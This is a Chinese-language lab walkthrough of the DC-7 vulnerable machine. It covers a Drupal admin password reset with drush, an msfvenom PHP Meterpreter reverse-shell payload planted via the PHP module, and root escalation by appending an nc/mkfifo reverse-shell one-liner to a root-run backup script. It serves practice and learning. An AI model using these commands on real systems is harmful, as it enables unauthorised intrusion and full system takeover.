靶机渗透DC-7

2020-04-20 11:17:40 浏览数 (1)

001001

早几天做到这题是不是360考核就能多对一道题了,菜是原罪······

CMS还是Drupal,msf几个模块都没成功,扫描后台也没扫描出什么有用的信息。应该还是在网站上。

002002

终于找到不一样的地方了。

网上搜索一下,提示github上面有,然后在config.php里面看到了信息,

003003

网站登陆但是失败,但是想起最开始扫描端口时候开了ssh,那就试试SSH登陆。

004004

登陆上来了。看下mbox。

005005

这里有个root权限执行的东西。

进入文件夹查看一下。

006006

发现只有root或者www-data权限才可以执行.sh

看一下具体内容。

007007

有个drush命令。查一下是什么东东。

008008

和Drupal有关的,专门用来管理Drupal站点的Shell,可以用来修改密码。

代码语言:javascript复制
drush user-password someuser --password="correct horse battery staple"

进入/var/www/html目录进行操作。

代码语言:javascript复制
drush user-password admin --password="hack123"

009009

然后去网站登陆。

010010

成功登陆。

随便翻翻,只有Content模块可以写入自己的东西,不出意外这里就是突破点了。

011011

没有PHP语言,网上查了下,可以手动下载。

代码语言:javascript复制
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

012012

如果下载显示连接失败的话可以下载到本地,再选择文件上传。

013013

装好之后勾选PHP,然后下面install

014014
015015

有了PHP的选项。

然后就利用msf反弹Shell

代码语言:javascript复制
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.154 LPORT=7777 -f raw

生成Shell代码,复制到网站上去。直接选择PHP类型,不然容易失败。

016016
017017

然后msf使用handler模块开启监听。

代码语言:javascript复制
set payload php/meterpreter/reverse_tcp
set lhost 192.168.70.154
set lport 7777
run

然后点击Preview

018018

成功进入meterpreter,信息收集下。

进入Shell模式,利用Python获得交互式Shell

代码语言:javascript复制
python -c "import pty;pty.spawn('/bin/bash')"
019019

接下来卡住了,翻目录也没什么有用的信息。不知道下一步该做什么了。

翻看前面,突然想到,刚才看到了backup.sh只有root权限才能使用,这里应该是突破点吧。

但是吧,还是不知道怎么破,菜是原罪······

看了师傅的笔记,跟着师傅的思路走一下。

方向确实没错,是利用这个backups.sh

代码语言:javascript复制
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.70.154 4444 >/tmp/f" >> backups.sh

将反弹shell的代码附加到backups.sh脚本中

执行这条语句反弹回一个监听Shell

020020

提权为root了!直接找flag即可。

021021

0 人点赞